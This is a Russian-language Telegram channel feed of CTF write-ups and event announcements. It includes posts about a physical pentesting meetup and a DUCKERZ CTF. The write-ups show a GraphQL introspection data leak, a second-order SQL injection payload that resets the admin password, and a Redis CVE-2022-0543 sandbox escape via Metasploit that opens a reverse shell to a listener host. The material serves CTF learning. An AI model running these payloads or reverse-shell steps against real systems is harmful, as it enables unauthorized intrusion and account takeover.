Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤41🔥22 4😱2 1
Райтапы по CTF{2026}
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥68❤15 6 1
💥 Записали митап по физическому пентесту — теперь всё лежит на RUTUBE.
29 января мы собрались в офисе Solar в Москве и поговорили про полный цикл физического пентеста: от OSINT и подготовки легенды до проникновения в офис и использования железа вроде O.MG Cable.
В плейлисте три доклада:
🔹 Егор Зайцев (@pro_pentest) — «Физический пентест: от OSINT до полной компрометации компании»
🔹 Андрей Зенин (Бастион) — «Физический пентест: этапы, практика и реальные кейсы»
🔹 Александр Хабибуллин (CyberOK) — «O.MG Cable: доверие к USB обернулось атакой»
Если интересен реальный физический редтимминг, социальная инженерия и практические кейсы с полей — залетай смотреть.
👉 Плейлист тут:
https://rutube.ru/plst/1456882/
💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
29 января мы собрались в офисе Solar в Москве и поговорили про полный цикл физического пентеста: от OSINT и подготовки легенды до проникновения в офис и использования железа вроде O.MG Cable.
В плейлисте три доклада:
🔹 Егор Зайцев (@pro_pentest) — «Физический пентест: от OSINT до полной компрометации компании»
🔹 Андрей Зенин (Бастион) — «Физический пентест: этапы, практика и реальные кейсы»
🔹 Александр Хабибуллин (CyberOK) — «O.MG Cable: доверие к USB обернулось атакой»
Если интересен реальный физический редтимминг, социальная инженерия и практические кейсы с полей — залетай смотреть.
👉 Плейлист тут:
https://rutube.ru/plst/1456882/
Please open Telegram to view this post
VIEW IN TELEGRAM
RUTUBE
Физический пентест: кейсы, инструменты, практика 29.01.2026 – смотреть плейлист, все 3 видео подборки от "Райтапы по CTF{2026}"…
Физический пентест: кейсы, инструменты, практика 29.01.2026 подготовил для Вас 3 видеороликов - смотри онлайн бесплатно!
❤20
А еще, райтапы от организаторов будут в нашем канале сразу после мероприятия...
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
DUCKERZ
🚩 DUCKERZ CTF
Зима в самом разгаре, а значит настало время для DUCKERZ CTF, онлайн соревнования по информационной безопасности от нашей команды.
🐥Формат task-based
🐥Команды до 5 человек
🐥С 12:00 7 февраля по 12:00 8 февраля (МСК)
Участвовать могут все…
Зима в самом разгаре, а значит настало время для DUCKERZ CTF, онлайн соревнования по информационной безопасности от нашей команды.
🐥Формат task-based
🐥Команды до 5 человек
🐥С 12:00 7 февраля по 12:00 8 февраля (МСК)
Участвовать могут все…
❤14🔥7 6
Райтапы по CTF{2026}
💥 Записали митап по физическому пентесту — теперь всё лежит на RUTUBE. 29 января мы собрались в офисе Solar в Москве и поговорили про полный цикл физического пентеста: от OSINT и подготовки легенды до проникновения в офис и использования железа вроде O.MG…
Друзья, я знаю, что вам не хватило времени задать свои вопросы Егору, и именно поэтому мы решили провести СТРИМ-поскриптум, где ответим на всё, что вас интересует!
Форма, куда можно отправить свой вопрос:
https://forms.yandex.ru/u/6984a1da90fa7b1a56545f8c/
На всякий случай — запись доклада для тех, кто ещё не посмотрел:
https://rutube.ru/video/a54900346f6b71186397e2e232839c18/
Стрим проведём 13 февраля — включайте уведомления, чтобы не пропустить!
💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Форма, куда можно отправить свой вопрос:
https://forms.yandex.ru/u/6984a1da90fa7b1a56545f8c/
На всякий случай — запись доклада для тех, кто ещё не посмотрел:
https://rutube.ru/video/a54900346f6b71186397e2e232839c18/
Стрим проведём 13 февраля — включайте уведомления, чтобы не пропустить!
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤14 5 3
Forwarded from InfoSec VK Hub
Всем привет!
А вот и финальный разбор в нашей серии! Последний пазл, флаг за который дал целых 400 очков. Иногда самая простая ошибка — оставить introspection в GraphQL — становится очень дорогой...
Persik ICO Writeup
Проверим включена ли introspection:
Из схемы составим query getEligibleUsers и получим список список адресов участников airdrop'а:
Выберем любой адрес и передадим его в checkAirdrop:
Опционально можно было использовать адрес администратора из admin query:
На этом серия разборов подходит к концу. Мы прошли путь от базовых уязвимостей до тонкостей GraphQL, где одна невыключенная настройка открыла доступ ко всей логике и данным сервиса. Этот таск — отличное напоминание: безопасность API часто ломается на самых простых вещах: забытых отладочных интерфейсах, излишней детализации ошибок или избыточных правах.
Предыдущие разборы серии:
1 часть
2 часть
3 часть
VK Security | Буст этому каналу
#разбор #CTF
А вот и финальный разбор в нашей серии! Последний пазл, флаг за который дал целых 400 очков. Иногда самая простая ошибка — оставить introspection в GraphQL — становится очень дорогой...
Persik ICO Writeup
category: web, points: 400
Airdrop токена Persik уже прошёл, а вы - опоздали ... но сервис хранит больше данных, чем должен!
Достаньте любой eligible-адрес и заберите флаг
После подключения кошелька видно, что для проверки участвует ли адрес в airdrop'е отсылается GraphQL query checkAirdrop на эндпойнт /graphql. Увидим, что по этому пути нам доступен GraphiQL.
Проверим включена ли introspection:
query { __schema { types { name kind fields { name type { name kind } } } } }
Из схемы составим query getEligibleUsers и получим список список адресов участников airdrop'а:
query GetEligibleUsers { getEligibleUsers { address tokensClaimed airdropEligible } }
Выберем любой адрес и передадим его в checkAirdrop:
query CheckAirdrop($addr: String!) { checkAirdrop(address: $addr) { address tokensClaimed airdropEligible flag } }
И получим флаг:
{
"data": {
"checkAirdrop": {
"address": "0x8ba1f109551bD432803012645aac136c22C19e00",
"tokensClaimed": 3000,
"airdropEligible": true,
"flag": "vkctf{edd3417a9eb5c85b361d196e504b05a0}"
}
}
}
Опционально можно было использовать адрес администратора из admin query:
query AdminInfo { admin { secretKey vaultAddr } }
На этом серия разборов подходит к концу. Мы прошли путь от базовых уязвимостей до тонкостей GraphQL, где одна невыключенная настройка открыла доступ ко всей логике и данным сервиса. Этот таск — отличное напоминание: безопасность API часто ломается на самых простых вещах: забытых отладочных интерфейсах, излишней детализации ошибок или избыточных правах.
Предыдущие разборы серии:
1 часть
2 часть
3 часть
VK Security | Буст этому каналу
#разбор #CTF
❤9 4
Forwarded from DUCKERZ
Соревнование DUCKERZ CTF 2026 официально началось! Желаем всем участникам удачи и успешного решения задач.
Please open Telegram to view this post
VIEW IN TELEGRAM
DUCKERZ
Всем привет! Живы? Я не очень, Дакерзы заставили попотеть
Как обычно, жду ваши райтапы после соревнования! @freenameruuuu
Мы обязательно выживем🪢
💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Как обычно, жду ваши райтапы после соревнования! @freenameruuuu
Мы обязательно выживем
Please open Telegram to view this post
VIEW IN TELEGRAM
#duckerzctf2026 #Web
🏥 Клиника [клик]
Уязвимость Second-Order SQL Injection в обработчике /update-password. Хотя регистрация и вход используют параметризованные запросы, имя пользователя из сессии подставляется в SQL-запрос обновления пароля через обычную шаблонную строку.
Это позволяет использовать «отравленный» логин для атаки на базу данных. Регистрируем аккаунт с пейлоадом в качестве имени пользователя:
После входа под этим аккаунтом значение попадает в сессию. При смене пароля в настройках профиля сервер выполнит инъекцию: кавычка закроет поле username, а символы -- закомментируют остаток оригинального запроса.
В результате SQL-запрос изменит пароль не нам, а администратору:
Заходим под admin с новым паролем и забираем флаг в панели управления.
💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
🏥 Клиника [клик]
Уязвимость Second-Order SQL Injection в обработчике /update-password. Хотя регистрация и вход используют параметризованные запросы, имя пользователя из сессии подставляется в SQL-запрос обновления пароля через обычную шаблонную строку.
Это позволяет использовать «отравленный» логин для атаки на базу данных. Регистрируем аккаунт с пейлоадом в качестве имени пользователя:
admin' --
После входа под этим аккаунтом значение попадает в сессию. При смене пароля в настройках профиля сервер выполнит инъекцию: кавычка закроет поле username, а символы -- закомментируют остаток оригинального запроса.
В результате SQL-запрос изменит пароль не нам, а администратору:
UPDATE users SET password = '[hash]' WHERE username = 'admin' --'
Заходим под admin с новым паролем и забираем флаг в панели управления.
Please open Telegram to view this post
VIEW IN TELEGRAM
#duckerzctf2026 #Misc
Редиска [клик]
Flask-приложение с Redis. Имитация старой системы "Enterprise Logic Pro 2000". Сразу обращаем внимание на версию Redis, используемую на сервере. Это Redis 5.0.7. Он не защищен паролем (
Эта версия Redis уязвима к CVE-2022-0543. Это критическая RCE-уязвимость в Redis для Debian и Ubuntu, позволяющая выполнить произвольный код на сервере через обход ограничений Lua-песочницы.
На сервере с белым IP открываем listener на 4444 порту
Получаем rev-shell на тачке с Redis. Флаг находится в корне
💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Редиска [клик]
Flask-приложение с Redis. Имитация старой системы "Enterprise Logic Pro 2000". Сразу обращаем внимание на версию Redis, используемую на сервере. Это Redis 5.0.7. Он не защищен паролем (
requirepass пустой), что позволяет любому пользователю отправлять команды без аутентификации, но флага там нет.Эта версия Redis уязвима к CVE-2022-0543. Это критическая RCE-уязвимость в Redis для Debian и Ubuntu, позволяющая выполнить произвольный код на сервере через обход ограничений Lua-песочницы.
msfconsole
use exploit/linux/redis/redis_debian_sandbox_escape
На сервере с белым IP открываем listener на 4444 порту
nc -lvnp 4444
set RHOSTS 94.19.79.169
set RPORT 20004
unset PASSWORD
set LHOST 45.140.19.200
set LUA_LIB /usr/lib/x86_64-linux-gnu/liblua5.1.so.0
set ForceExploit true
Получаем rev-shell на тачке с Redis. Флаг находится в корне
cat ../../flag.txt
Please open Telegram to view this post
VIEW IN TELEGRAM